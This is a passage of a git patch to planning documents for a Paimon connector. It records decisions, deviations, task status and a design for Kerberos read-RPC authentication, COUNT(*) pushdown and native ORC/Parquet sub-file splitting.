`AbstractPaimonProperties$1`)、checkstyle 0。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | | D-052 | P5-fix#6 | **FIX-KERBEROS-DOAS / M-11(MAJOR,Kerberos-HMS)= full legacy parity 包全部 read RPC(用户签字,2026-06-11,取代 D7=B 的 read 从句)**:翻闸后连接器 metadata **读** RPC(listDatabases/getDatabase/listTables/getTable[getTableHandle+getSysTableHandle+resolveTable]/listPartitions)**不**包 `executeAuthenticated`,仅 4 个 DDL op 包(B3 **D7=B** 故意 read-vs-DDL 不对称、把 read-path doAs 推给 live-e2e 门)→ Kerberos HMS 上 SHOW PARTITIONS/MTMV/partitions-TVF + 任何 getTable 读 RPC 跑在 catalog principal 之外。legacy `PaimonMetadataOps`/`PaimonExternalCatalog` 包**每个** read(`getPaimonPartitions:99`、`getPaimonTable:137`、listDatabases/listTables/getDatabase)。**用户定 = full legacy parity(vs 仅包 listPartitions / vs defer)**:仅包 listPartitions 是半吊子(连分区路径自身先行的 getTable reload 都漏);defer 则须登 accepted-deviation。本签字**取代 D7=B 的 read-path 从句**(4 DDL op 仍包)。**修=连接器 only、零 SPI**:7 处 read site 包 `context.executeAuthenticated`,其中 `resolveTable`(metadata + scan 双 site)一处包覆盖所有 resolveTable 调用方(DRY)。**异常流关键**:Kerberos `UGI.doAs` 把抛出的 checked `Catalog.{Table,Database}NotExistException` 包成 `UndeclaredThrowableException`(仅 IOException/RuntimeException/Error 透传)→ 故 domain 异常**必须在 lambda 内**捕获(镜像 legacy `getPaimonPartitions:104`),listDatabases/resolveTable 的既有 catch-all 在外吸收。scan `resolveTable` 对 `context==null`(2-arg ctor 离线测)走直连,与同文件 `getScanNodeProperties` 既有 null-context 约定一致。守门:连接器模块 248/0/0(1 CI-gated skip)、新 `PaimonConnectorMetadataReadAuthTest` 12/0/0 + scan 2、fail-before 3 red(authCount/log-empty)、import-gate 净、checkstyle 0。真值闸=live Kerberos HMS e2e(CI-gated、无套件,[DV-031](./deviations-log.md))。设计 [`P5-fix-KERBEROS-DOAS-design.md`](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) | 2026-06-11 | ✅ | @@ -66,7 +67,16 @@ ## 详细记录(时间倒序) -### D-054 — `FIX-COUNT-PUSHDOWN`(#8 M-2)= 新增 default `planScan(countPushdown)` overload + 连接器 collapse-to-one +### D-055 — `FIX-NATIVE-SUBSPLIT`(#9 M-3)= 连接器侧移植 native 文件切分(纯连接器,零 SPI/零 fe-core) + +- **日期**:2026-06-12 +- **状态**:✅ 生效 +- **关联**:[task-list #9](./task-list-P5-rereview2-fixes.md)、[设计](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md)、[第二轮 review report](./reviews/P5-paimon-rereview2-2026-06-11.md)(M-3)、[DV-033]、recon `wf_ad764bf6-1c9` +- **背景**:翻闸后大 native ORC/Parquet paimon 文件只得一个 scanner(无文件内并行),连接器 native 臂每 RawFile 发一个整文件 range;legacy 经 `FileSplitter.splitFile` 切大文件。结果正确仅并行度回归(perf-parity)。 +- **决策**:(1) **fix-now**(vs defer,P2 scope 用户签字)。(2) **纯连接器、零 SPI、零 fe-core**:切分 math 是对 5 个 session var 的 long 算术(`VariableMgr.toMap` 通道,同 `isCppReaderEnabled`),连接器禁 import fe-core `FileSplitter`/`SessionVariable` 故逐字重述;`start/length/fileSize` 经既有 `PaimonScanRange.Builder` 序列化路径达 BE,无新 SPI/thrift。(3) **DV×sub-split 安全、不设 guard**:同一 per-RawFile DeletionFile 原样附到每个 sub-range(DV 按全局行位、BE 部分 byte range 仍报全局行位、`_kv_cache` 按 path+offset 共享位图、iceberg 同机制)。(4) 仅移植 specified-size 分支(block-based 死代码:连接器 target 恒>0、blockLocations=null)。 +- **替代方案**:① **defer**(登 deviations)——用户选 fix-now。② **经 SPI 把 fe-core FileSplitter 暴露给连接器** / **fe-core 侧切分**——否决:切分纯 math、连接器自足、无 fe-core 改最小 blast。③ **DV-bearing 文件不切**(保守 guard)——recon 证伪(DV+split 安全),不必要地放弃 DV 文件的并行。 +- **影响**:1 产线文件(连接器 `PaimonScanPlanProvider`:5 常量 + 2 纯静态 + `sessionLong`/`resolveTargetSplitSize` + native 臂 loop + `buildNativeRange` 加 start/length)+ 1 测文件。**零 SPI**(无 RFC 条目)、**零 fe-core**。split-weight 调度 nicety 不移植 [DV-033]。守门见索引行。 + - **日期**:2026-06-12 - **状态**:✅ 生效 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 426c331c50c94e..ed1197eac90274 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -17,6 +17,7 @@ | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-033 | P5-fix#9 FIX-NATIVE-SUBSPLIT:**split-weight / target-size 调度 nicety 不移植**(用户签字采纯连接器实现,2026-06-12)。legacy `fileSplitter.splitFile` 经 `splitCreator.create(...,targetFileSplitSize,...)` 在每个 `FileSplit` 上设 split weight + targetSplitSize,供 `FederationBackendPolicy` 做 backend 分配均衡。连接器 native sub-range(`buildNativeRange`)**不设** `selfSplitWeight`/targetSplitSize——但这是 **pre-existing**:翻闸后单-range native 路本就没设(`buildNativeRange` 从未设 weight,仅 JNI 路 `buildJniScanRange` 经 `computeSplitWeight` 设)。#9 **不引入**该缺口,只是把一个整文件 range 变成多个 sub-range(并行度本身已恢复,这是 #9 的目的)。纯调度均衡质量、非正确性、非并行度。连接器 SPI 无 per-range weight 喂入 FileSplit 的通道(`PaimonScanRange` 无 targetSplitSize 字段)。跨连接器:hudi/iceberg full-adopter 若要 weight-均衡可后续在 SPI/`PaimonScanRange` 加 weight 字段批量补(与既有 native-path weight 缺口一并)。真值闸=live-e2e(观察 backend 分配均衡,非正确性) | [task-list #9](./task-list-P5-rereview2-fixes.md) / [P5-fix-NATIVE-SUBSPLIT 设计](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) / [D-055](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf/调度-only,pre-existing;live-e2e 真值闸)| | DV-032 | P5-fix#8 FIX-COUNT-PUSHDOWN:**collapse-to-one 丢 legacy `>10000` 并行 count-split trim**(用户签字采 collapse-to-one,2026-06-12)。legacy `PaimonScanNode:484-495` 收齐 count-eligible split 后按 `pushDownCountSum` 分流——`>COUNT_WITH_PARALLEL_SPLITS(10000)` 时 trim 到 `parallelExecInstanceNum * numBackends` 个 split 并 `assignCountToSplits` 把 total 均摊(BE 每 split CountReader 再求和回 total);`<=10000` 则 `singletonList(first)` 收一 split 携全 total。连接器**始终 collapse-to-one**(无论 countSum 大小),因连接器无 `numBackends`/`parallelExecInstanceNum`(fe-core scan-node-only,`getSplits(int numBackends)` 才有)。**纯 perf 偏差、结果恒等**:单 CountReader 在一个 fragment emit `countSum` 个空行(无 IO)而非 N 个并行——对超大 count 不并行化 count-emit。CountReader 不读数据故影响小。**未采 full-parity**(连接器发 per-split + fe-core 按 numBackends trim+redistribute)以避免把 count 语义耦进通用 `ConnectorScanRange` + 多 fe-core 代码。跨连接器:hudi/iceberg full-adopter 若要 `>10000` 并行可后续在 fe-core 加 trim hook(与 [DV-028]/[DV-030]/[DV-031]「新连接器读法 vs fe-core 既有约定」类缝同批考量)。真值闸=live-e2e(超大 PK 表 `COUNT(*)` 仍正确、仅观察 fragment 并行度差异) | [task-list #8](./task-list-P5-rereview2-fixes.md) / [P5-fix-COUNT-PUSHDOWN 设计](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md) / [D-054](./decisions-log.md) | 2026-06-12 | 🟢 已登记(perf-only,结果恒等;live-e2e 真值闸)| | DV-031 | P5-fix#6 FIX-KERBEROS-DOAS 两接受项:① **真 doAs 端到端 = live-Kerberos-e2e only**——M-8(filesystem/jdbc over Kerberized HDFS)+ M-11(Kerberos HMS read RPC)的 FE-unit 测只覆盖 **wiring**(M-8 断言 `getExecutionAuthenticator()` 返 `HadoopExecutionAuthenticator` 类型、不调 initializeCatalog;M-11 用 `RecordingConnectorContext.failAuth`/`authCount` 断言 read 经 `executeAuthenticated`),**无 paimon-kerberos regression 套件**(现有 `regression-test/.../kerberos/` 4 套仅 hive+iceberg、gated by `enableKerberosTest`)→ 真 KDC doAs 留给 live-e2e 门(翻闸前必验)。fail-safe:非 Kerberos 部署 no-op authenticator 与真 authenticator 行为一致(`ExecutionAuthenticator.execute`=`task.call()`)、无回归。② **跨连接器 follow-up**:read-vs-DDL doAs 缺口(M-11)+ 翻闸-authenticator-wiring 缺口(M-8,`initializeCatalog` 死代码)在 hudi/iceberg full-adopter **同样复发**(`cutover-fe-dispatch-gap` 姊妹);与 [DV-028](#4 CREATE-time-only 校验)/[DV-030](#5 mapping-flag 键)同属「新连接器读法/翻闸 vs fe-core 既有约定」类缝,将来可批量 close。**M-8 新增 fe-core `MetastoreProperties.initExecutionAuthenticator` hook 是 fe-core 内部扩展、非连接器 SPI**(`ConnectorContext`/`Connector` 表面未改)→ 01-spi-extensions-rfc.md 无须改 | [task-list #6](./task-list-P5-rereview2-fixes.md) / [P5-fix-KERBEROS-DOAS 设计](./tasks/designs/P5-fix-KERBEROS-DOAS-design.md) / [D-052](./decisions-log.md) / [D-053](./decisions-log.md) | 2026-06-11 | 🟢 已登记(live-e2e 真值闸 + 跨连接器 follow-up)| | DV-030 | P5-fix#5 FIX-MAPPING-FLAG-KEYS 跨连接器 follow-up(用户定本轮 paimon-only):**新 hive + iceberg 连接器同根因**——读**下划线** mapping-flag 键而 fe-core 只写/读/藏**点分** catalog 键(`CatalogProperty:50,52`),`PluginDrivenExternalCatalog.createConnectorFromProperties` 喂原始 catalog map、中间无点分→下划线归一化 → 用户在 CREATE CATALOG 开 `enable.mapping.varbinary`/`enable.mapping.timestamp_tz` 对 hive/iceberg 亦**静默失效**(BINARY→STRING、LTZ→DATETIMEV2)。**iceberg** = `enable_mapping_varbinary`/`enable_mapping_timestamp_tz`(`IcebergConnectorProperties:46,47`→`IcebergConnectorMetadata:151,154`),仅分隔符差、语义不反转。**hive** = `enable_mapping_binary_as_string`/`enable_mapping_timestamp_tz`(`HiveConnectorProperties:52,53`→`HiveConnectorMetadata:317,319`),binary 键既改分隔符又改 token,但 `binary_as_string` 是**误名非语义反转**(`HmsTypeMapping:90-93` true→VARBINARY,喂 `mapBinaryToVarbinary` 字段)。JDBC 是唯一正确的新连接器(点分)。legacy hive/iceberg 经 `getCatalog().getEnableMappingVarbinary()` 读点分(`HMSExternalTable:791`/`IcebergUtils:1083`)→ 翻闸回归。**用户签 [D-051] = 本轮只修 paimon**(保 commit surgical、单任务);**follow-up(close 时)**:hive+iceberg 两常量重指 canonical 点分键(hive `binary_as_string` token 复原为 `varbinary`,**勿**反转 boolean)+ 各加 dotted-key honor UT;与 paimon #5 同形修。scope 经验证 workflow `wf_a3626c54-0db`(g5 + synthesizer,静态 trace 未 live) | [task-list #5](./task-list-P5-rereview2-fixes.md) / [P5-fix-MAPPING-FLAG-KEYS 设计](./tasks/designs/P5-fix-MAPPING-FLAG-KEYS-design.md) / [D-051](./decisions-log.md) | 2026-06-11 | 🟡 待修(跨连接器 follow-up,用户定本轮 paimon-only)| @@ -54,6 +55,20 @@ ## 详细记录(时间倒序) +### DV-033 — P5-fix#9 FIX-NATIVE-SUBSPLIT:split-weight / target-size 调度 nicety 不移植(PERF/调度-ONLY,pre-existing) + +- **发现日期**:2026-06-12 +- **发现 session / agent**:#9 recon(`wf_ad764bf6-1c9`,synthesizer 标 "parity nicety, not a blocker")。 +- **当前状态**:🟢 已登记(perf/调度-only,pre-existing;live-e2e 真值闸) +- **原计划位置**:[P5-fix-NATIVE-SUBSPLIT 设计](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md) §Out of scope +- **偏差描述**:legacy `fileSplitter.splitFile` 经 `splitCreator.create(path, start, length, fileLength, targetFileSplitSize, ...)` 在每个 `FileSplit` 上设 per-split weight + targetSplitSize,供 `FederationBackendPolicy` 做 backend 分配均衡。连接器 native sub-range(`buildNativeRange`)不设 `selfSplitWeight`/targetSplitSize。 +- **为何可接受**:① **pre-existing**——翻闸后单-range native 路本就没设 weight(`buildNativeRange` 从未设、仅 JNI 路 `buildJniScanRange` 经 `computeSplitWeight` 设);#9 不引入该缺口,只是把整文件 range 切成多 sub-range。② 纯**调度均衡质量**、非正确性、非并行度——#9 的目的(文件内并行)已达成(发多个 sub-range)。③ 连接器 SPI 无 per-range weight 喂入 FileSplit 的通道(`PaimonScanRange` 无 targetSplitSize 字段)。 +- **影响范围**:仅 backend 分配的负载均衡质量;读结果与并行度均正确。 +- **关联**:[D-055]、native-path weight 既有缺口 +- **后续动作**: + - [ ] 跨连接器:若要 weight-均衡,后续在 SPI/`PaimonScanRange` 加 weight 字段,与既有 native-path weight 缺口一并补(hudi/iceberg full-adopter 同需)。 + - [ ] live-e2e:观察大文件多 sub-range 的 backend 分配(均衡差异为预期、非正确性问题)。 + ### DV-032 — P5-fix#8 FIX-COUNT-PUSHDOWN:collapse-to-one 丢 legacy `>10000` 并行 count-split trim(PERF-ONLY,用户签字) - **发现日期**:2026-06-12 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 3b10e679ed4da0..75efdcb692279e 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -30,8 +30,8 @@ | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | M-8: wire HDFS authenticator for fs/jdbc (fe-core); M-11: wrap ALL read RPCs in `executeAuthenticated` (connector, full legacy parity) | no³ | ✅ | ✅ | ✅ 248/0/0 + 21/0/0 | ✅ `2b1442fa57a` | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ✅ | ✅ | ✅ 250/0/0 | ✅ `05132a42668` | -| 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf); SPI count-pushdown overload + fe-core forward + connector collapse-to-one | **yes** | ✅ | ✅ | ✅ 252/0/0 + fe-core | 🔄 pending | -| 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf); SPI count-pushdown overload + fe-core forward + connector collapse-to-one | **yes** | ✅ | ✅ | ✅ 252/0/0 + fe-core | ✅ `525be03371c` | +| 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism); connector-side port of FileSplitter + determineTargetFileSplitSize | no | ✅ | ✅ | ✅ 258/0/0 | 🔄 pending | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). ³ #6 SPI corrected `maybe`→**`no`** ([D-052](./decisions-log.md)/[D-053](./decisions-log.md)): M-11 is connector-only (wraps existing `ConnectorContext.executeAuthenticated`, full legacy parity per signed [D-052], superseding the D7=B read-path clause). M-8 adds an **internal fe-core hook** `MetastoreProperties.initExecutionAuthenticator(List)` (default no-op, wired in `PluginDrivenExternalCatalog`) — **not** connector SPI (`ConnectorContext`/`Connector` surface unchanged), so 01-spi-extensions-rfc.md is not touched. Scope = filesystem+jdbc only (DLF/REST/HMS excluded, "DLF" clause overstated). True end-to-end doAs is live-Kerberos-e2e only ([DV-031](./deviations-log.md)). @@ -106,14 +106,17 @@ Legend: ⬜ todo / 🔄 in progress / ✅ done > Both are correct-results, perf/parallelism-only. Recommend **accept-or-defer** unless perf parity is required for cutover. If deferring, log in `deviations-log.md`. ### 8. FIX-COUNT-PUSHDOWN — `COUNT(*)` pushdown not implemented (M-2) -- **✅ DONE** (commit pending; design [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md), [D-054](./decisions-log.md), [DV-032](./deviations-log.md), [RFC §25 E15](./01-spi-extensions-rfc.md)). User signed off (2026-06-12): **proceed** + **connector collapse-to-one**. +- **✅ DONE** `525be03371c` (design [`P5-fix-COUNT-PUSHDOWN-design.md`](./tasks/designs/P5-fix-COUNT-PUSHDOWN-design.md), [D-054](./decisions-log.md), [DV-032](./deviations-log.md), [RFC §25 E15](./01-spi-extensions-rfc.md)). User signed off (2026-06-12): **proceed** + **connector collapse-to-one**. Adversarial review `wf_6ead7c2c-b58`: 1 MAJOR (degenerate single-split test) caught+fixed → strengthened to a 2-partition asymmetric-count (2+3=5) fixture pinning collapse N→1 + cross-split sum; 2 MINORs refuted (batch-path moot, EXPLAIN count-line cosmetic). - Recon (`wf_1ce48c93-325`) re-verified vs current code: the emit seam (`PaimonScanRange.Builder.rowCount`→`paimon.row_count`→`setTableLevelRowCount`) AND the COUNT enum→BE path are **already built**; only the **signal+compute** was missing → **NOT pure-connector** (corrected the initial framing). `dataSplit.mergedRowCount()` is SDK-only (connector); the `getPushDownAggNoGroupingOp()==COUNT` signal lives only on the fe-core node and reached nobody. - **Fix (3 files):** SPI `ConnectorScanPlanProvider` +1 default 7-arg `planScan(...,boolean countPushdown)` (delegates to 6-arg; other connectors no-op) [E15]; fe-core `PluginDrivenScanNode.getSplits` reads the agg-op and forwards (no post-loop math); connector `PaimonScanPlanProvider` extracts `planScanInternal(...,countPushdown)` + count short-circuit first-arm + static `isCountPushdownSplit` + `buildCountRange` (**collapse-to-one**: sum eligible `mergedRowCount`, emit ONE JNI count range bearing the total = legacy's ≤10000 case). Param=`boolean`, paimon-only (engineering calls). legacy `>10000` parallel-split trim intentionally dropped → [DV-032]. - **Gates:** connector 252/0/0 (1 CI-gated live skip), fe-core compile + checkstyle 0, import-gate clean, **fail-before exactly the 2 new tests red** (neuter `isCountPushdownSplit`→false), end-to-end real-local-PK-table test asserts collapse-to-one carrying the merged total (2). Real BE CountReader selection = CI-gated live-e2e (legacy paimon count regression covers the BE contract; no BE change). ### 9. FIX-NATIVE-SUBSPLIT — native sub-file splitting lost (M-3) -- **User signed off (2026-06-12): implement now.** ⬜ next. -- One split per RawFile; large ORC/Parquet files get a single scanner. `PaimonScanPlanProvider.java:263-286` vs `source/PaimonScanNode.java:434-465` (`determineTargetFileSplitSize` + `fileSplitter.splitFile`). See also critic coverage-gap on split-count accounting (P3). +- **✅ DONE** (commit pending; design [`P5-fix-NATIVE-SUBSPLIT-design.md`](./tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md), [D-055](./decisions-log.md), [DV-033](./deviations-log.md)). User signed off (2026-06-12): **implement now**. +- Recon (`wf_ad764bf6-1c9`): real gap (ORC/Parquet are PLAIN/splittable, legacy *does* sub-split); DV × sub-split is **SAFE** (DV rowids are global file positions; BE readers report global positions in a partial range; same DV on every sub-range, no offset re-basing, no guard); **pure-connector, zero SPI, zero fe-core** (the splitter math + 5 session vars re-stated with plain longs; only the specified-size `FileSplitter` branch is reachable). +- **Fix (1 file):** connector `PaimonScanPlanProvider` — 5 file-split session-var constants, 2 pure statics (`computeFileSplitOffsets` byte-exact port incl. the `>1.1D` tail guard; `determineTargetSplitSize` = `determineTargetFileSplitSize` + `applyMaxFileSplitNumLimit`, batch branch omitted), `sessionLong` + lazy `resolveTargetSplitSize`, native-arm sub-split loop, `buildNativeRange(+start,+length)`. +- **Gates:** connector 258/0/0 (1 CI-gated live skip), checkstyle 0, import-gate clean, **fail-before exactly the 3 splitting tests red** (neuter `computeFileSplitOffsets`→single range), end-to-end append-only fixture (small `file_split_size` → ≥2 contiguous sub-ranges tiling `[0,fileLength)`; default → 1 range). split-weight scheduling nicety not ported (pre-existing) → [DV-033]. Real BE multi-range + DV read = CI-gated live-e2e (legacy paimon regression covers the BE contract; no BE change). +- **Adversarial review `wf_4ac7479d-39d`: 2 confirmed (both fixed), 2 refuted.** (1) MINOR parity gap — under COUNT(*) pushdown a native-eligible split with no precomputed merged count (e.g. DV w/ null cardinality) was sub-split where legacy keeps it whole (`splittable=!applyCountPushdown`); my design/comments falsely claimed "no interaction". Fixed: native arm passes target=0 under `countPushdown` → single whole-file range (byte-exact legacy parity; correctness-neutral either way since BE sets per-scanner agg=NONE w/ DV). (2) MAJOR test gap (Rule 9) — no test pinned "same DV on every sub-range". Fixed: extracted `buildNativeRanges` + test asserts every sub-range carries the DV (mutation: DV only on first → red, verified). Refuted: split-weight (already DV-033), DV-correctness false alarms. --- diff --git a/plan-doc/tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md b/plan-doc/tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md new file mode 100644 index 00000000000000..42a0dc96b0ccfa --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-NATIVE-SUBSPLIT-design.md @@ -0,0 +1,124 @@ +# P5 fix #9 — `FIX-NATIVE-SUBSPLIT` (M-3) + +> Round-2 severity MAJOR (round-1 MINOR), perf-parity (parallelism). User signed off (2026-06-12): +> **implement now**. Pure-connector, **zero SPI**, **zero fe-core** (engineering-confirmed by recon +> `wf_ad764bf6-1c9`). + +## Problem +After cutover, a large native (ORC/Parquet) paimon data file gets **one** scanner — no intra-file +parallelism. The connector (`PaimonScanPlanProvider` native arm) emits exactly ONE `PaimonScanRange` +per `RawFile` (`.start(0).length(file.length())`). Legacy `PaimonScanNode:434-465` sub-splits each +large ORC/Parquet file via `determineTargetFileSplitSize` + `fileSplitter.splitFile`. Result is +correct (BE reads the whole file either way); only read parallelism regresses. + +## Recon findings (verified vs source, `wf_ad764bf6-1c9`) +1. **Real gap, not a no-op.** ORC/Parquet infer `compressType=PLAIN` (`FileSplitter:115` via + `Util.inferFileCompressTypeByPath`), so `FileSplitter`'s `(!splittable || compressType != PLAIN)` + gate (`:116`) is NOT taken → real slicing at `:129-144` runs. Connector never slices. +2. **DV × sub-split is SAFE — no guard needed.** Paimon deletion-vector rowids are GLOBAL file row + positions; BE's native readers report global row positions even within a partial byte range (ORC + `getRowNumber()` seeded from stripe; Parquet `first_row` accumulated across all row groups before + the split-skip). BE's `_kv_cache` shares the parsed DV bitmap across sub-splits keyed by + `path+offset`. Iceberg uses the identical position-delete machinery on routinely-split files. + **Rule: attach the SAME unmodified per-`RawFile` `DeletionFile` (path/offset/length) to EVERY + sub-range — do NOT re-base offsets** (legacy parity, `PaimonScanNode:459-460`). (BE multi-range + + DV is asserted from BE source; true end-to-end proof is live-e2e — but the legacy native path + already ships exactly this wire shape, so it is not a new BE code path.) +3. **Pure-connector.** The compute is long arithmetic over 5 session vars read via the + `VariableMgr.toMap` channel (`ConnectorSession.getSessionProperties()`), exactly like + `isCppReaderEnabled`/`isForceJniScannerEnabled`. The connector cannot import fe-core + `FileSplitter`/`SessionVariable`, so the math is re-stated with plain longs. `start`/`length`/ + `fileSize` already serialize to BE (`PaimonScanRange.Builder` → `PluginDrivenSplit` FileSplit + ctor → `FileQueryScanNode.createFileRangeDesc` `setStartOffset/setSize/setFileSize`). + **No SPI change, no fe-core change, no user sign-off beyond the P2 scope ack.** +4. **Only the specified-size branch is reachable.** The connector passes `blockLocations=null` and a + target size that is **always > 0** (paimon is never batch-mode; the smallest target is + `max_initial_file_split_size`=32MB). So `FileSplitter`'s block-based branch (`:147+`) is dead for + the connector; only `:129-144` (the `> 1.1D` loop) must be ported. + +## Design (pure-connector, surgical) +**Session keys + defaults (byte-identical to `SessionVariable`, verified):** +`file_split_size`=0, `max_initial_file_split_size`=32MB(33554432), `max_file_split_size`=64MB(67108864), +`max_initial_file_split_num`=200, `max_file_split_num`=100000. + +**Two pure-static helpers (Rule 9 mutation-testable seams; mirror `shouldUseNativeReader`):** +- `computeFileSplitOffsets(long fileLength, long targetSplitSize) → List` — ports + `FileSplitter.splitFile`'s specified-size branch byte-for-byte, including the **`> 1.1D` tail guard** + (the last range absorbs a remainder up to 1.1× the target instead of a tiny tail split). + `fileLength<=0` → empty (legacy skips empty files); `targetSplitSize<=0` → single whole-file range + (defensive; never happens on the connector path). +- `determineTargetSplitSize(fileSplitSize, maxInitialSplitSize, maxSplitSize, maxInitialSplitNum, + maxFileSplitNum, totalNativeFileSize) → long` — ports `determineTargetFileSplitSize` + + `applyMaxFileSplitNumLimit` (`max(target, ceil(total/maxNum))`). The `isBatchMode → 0` branch is + omitted (paimon is never batch). + +**Glue (non-static):** `resolveTargetSplitSize(session, dataSplits)` reads the 5 session vars +(`sessionLong` helper, null/blank/parse-tolerant like `isCppReaderEnabled`) + sums +`rawFile.fileSize()` over native-eligible splits, then calls the pure static. Computed **lazily once** +on the first native split (legacy `hasDeterminedTargetFileSplitSize` parity). + +**Native arm change:** replace the single `buildNativeRange(file, df, fmt, partVals)` call with a loop +over `computeFileSplitOffsets(file.length(), targetSplitSize)`, each emitting a sub-range with the +SAME `deletionFile`. `buildNativeRange` gains `(start, length)` params (was hardwired `0/file.length()`); +`fileSize` stays `file.length()`. + +**No DV guard** (DV-bearing files sub-split safely, §2). **Count-pushdown splittable gate (legacy +parity):** legacy passes `splittable = !applyCountPushdown` to `fileSplitter.splitFile`. Most +count-eligible splits are siphoned to the count arm (`isCountPushdownSplit`), BUT a native-eligible +split whose merged count is **not** precomputed (e.g. a deletion vector with null cardinality) is NOT +siphoned and reaches the native arm with `countPushdown=true`. Legacy keeps such a split **whole** +(`splittable=false → one whole-file split`); the connector mirrors this by passing target size `0` +to `buildNativeRanges` under count pushdown (→ single whole-file range). Correctness-neutral either +way (BE sets per-scanner agg=NONE when a DV is present without a row count, so disjoint sub-ranges +count independently and the COUNT operator sums correctly), but matching legacy keeps the split count +byte-exact and avoids an undocumented divergence. The native arm is otherwise gated to ORC/Parquet +(`supportNativeReader`) = always PLAIN/splittable. + +## Out of scope / known gaps (honest) +- **Split-weight / target-size scheduling nicety:** legacy sets a per-split weight + targetSplitSize on + the `FileSplit` for `FederationBackendPolicy` balancing. The connector's native ranges omit + `selfSplitWeight` (**pre-existing** — the single-range native path already omitted it; #9 does not + regress it, it just emits more ranges). Scheduling-quality only, not correctness → [DV-033]. +- **Block-based splitting branch** (`FileSplitter:147+`) not ported — unreachable for the connector. + +## Risk analysis +- **Correctness:** unchanged. BE reads the same bytes whether 1 or N ranges; DV applies by global row + position per the recon. Contiguous tiling `[0..fileLength)` with no gap/overlap (unit-asserted). +- **#8 interaction:** count-eligible splits are siphoned to the count arm before the native gate. + Under count pushdown a native-eligible split that is NOT count-eligible (no precomputed merged + count) is kept WHOLE in the native arm (the count-pushdown splittable gate above) — legacy parity, + no sub-split, correctness-neutral. +- **Tiny files:** `fileLength <= 1.1 × target` → 1 whole-file range (unchanged behavior). + +## Test plan +- **Pure-static unit (fail-before drivable):** + - `computeFileSplitOffsets`: 250MB/64MB → `[0,64][64,64][128,64][192,58]` (1.1× tail keeps 58MB, no + 5th split); 256MB/64MB → 4 even; `fileLen ≤ 1.1×target` → 1 whole-file; `fileLength≤0` → empty; + `target≤0` → single. Assert contiguous tiling (no gap/overlap, Σlength = fileLength, last = remainder). + - `determineTargetSplitSize`: `file_split_size>0` returns it; total above/below + `max_file_split_size × max_initial_file_split_num` flips 64MB↔32MB; `max_file_split_num` floor + raises the size; defaults when keys absent. +- **End-to-end (offline via real local table + `sessionWithProps`):** set a tiny `file_split_size` so + even the sub-KB fixture file splits → assert `planScan` emits ≥2 native ranges that tile + `[0..fileLength)` contiguously. Do NOT pin the exact count (parquet byte size is encoder-dependent). +- **DV-on-every-sub-range (Rule 9, load-bearing):** `buildNativeRanges` with a `DeletionFile` + a + target that forces ≥2 ranges → assert EVERY sub-range carries the same (normalized) deletion file. + fail-before = attach the DV only to the first sub-range → red (a real DV-bearing split is live-e2e + only, so this is driven via the package-private `buildNativeRanges` with a hand-built `RawFile`+DV). +- **Count-pushdown whole-file:** `buildNativeRanges(..., targetSplitSize=0)` → exactly one whole-file + range (the count-pushdown splittable gate); mutation = sub-split under count pushdown → red. +- **fail-before:** neuter `computeFileSplitOffsets` to a single whole-file range → the multi-range + assertions go red; restore → green. +- **live-e2e (CI-gated):** real large-file parallelism + DV-bearing-file multi-range read — existing + legacy paimon regression covers the BE contract (no BE change). + +## Files +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProvider.java` — 5 constants, 2 static helpers, + `sessionLong` + `resolveTargetSplitSize`, native-arm loop, `buildNativeRange(+start,+length)`. +- `fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProviderTest.java` — static-math tests + + end-to-end sub-split test; update 3 existing `buildNativeRange` call sites to the new signature. + +## Log entries +- `decisions-log.md`: D-055 (P2 scope sign-off = implement; pure-connector design). +- `deviations-log.md`: DV-033 (split-weight scheduling nicety not ported — pre-existing, perf-only). +- `01-spi-extensions-rfc.md`: none (zero SPI). From dcc271455821f2f89848f814fe6c668e0a01abf6 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 12 Jun 2026 11:12:59 +0800 Subject: [PATCH 030/128] docs: checkpoint #8 + #9 done (P2 perf-parity all clear); hand off P3 coverage-gap verification MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - FIX-COUNT-PUSHDOWN (#8, M-2) = 525be03371c; FIX-NATIVE-SUBSPLIT (#9, M-3) = 2f5f467f53d. - Both recon'd (multi-scout workflow) + adversarially reviewed before commit; each review caught a real finding (degenerate test / parity gap) that was fixed. - P0/P1/P2 all clear. Next: 